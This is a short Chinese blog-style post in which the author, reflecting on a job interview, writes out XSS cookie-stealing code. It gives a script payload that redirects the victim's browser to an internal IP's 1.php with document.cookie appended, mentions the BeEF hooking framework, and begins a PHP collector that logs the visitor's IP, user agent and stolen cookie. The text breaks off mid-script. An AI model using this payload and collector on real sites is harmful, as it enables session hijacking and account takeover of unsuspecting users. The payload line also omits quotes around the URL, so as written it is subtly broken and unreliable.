题目可以说是很直白了,为什么突然写这个,还来源于前几天的面试,今年的校招因为一些公司的缩招,可以说是泥潭之争了,当然了,被面试官蹂躏也是自身水平和能力的限制,没有任何怨言。在面试官让我手写xss利用代码的时候,我才发现,因为一直以来的乙方的惯性思维,在漏洞利用和脚本上自己的实践太少了,但是还好,我还有很长很长的时间,可以努力。
在存在XSS漏洞的输入框中输入(IP地址为测试内网地址):
<script>document.location=http://10.170.61.174/1.php?cookie=document.cookie</script>
这里可以用document.location或者window.open, <script src="">来调用。但是调用后都会导致跳转,不知道还有什么其他好用的调用方法。突然想起来beEF,一次访问就可以hook,真的强。
1.php如下,放在web服务器的根目录:
<?php
$ip=$_SERVER['REMOTE_ADDR'];
//$referer=$_SERVER['HTTP_REFERER'];
$agent=$_SERVER['HTTP_USER_AGENT'];
$cookie = $_GET['cookie'];
$data =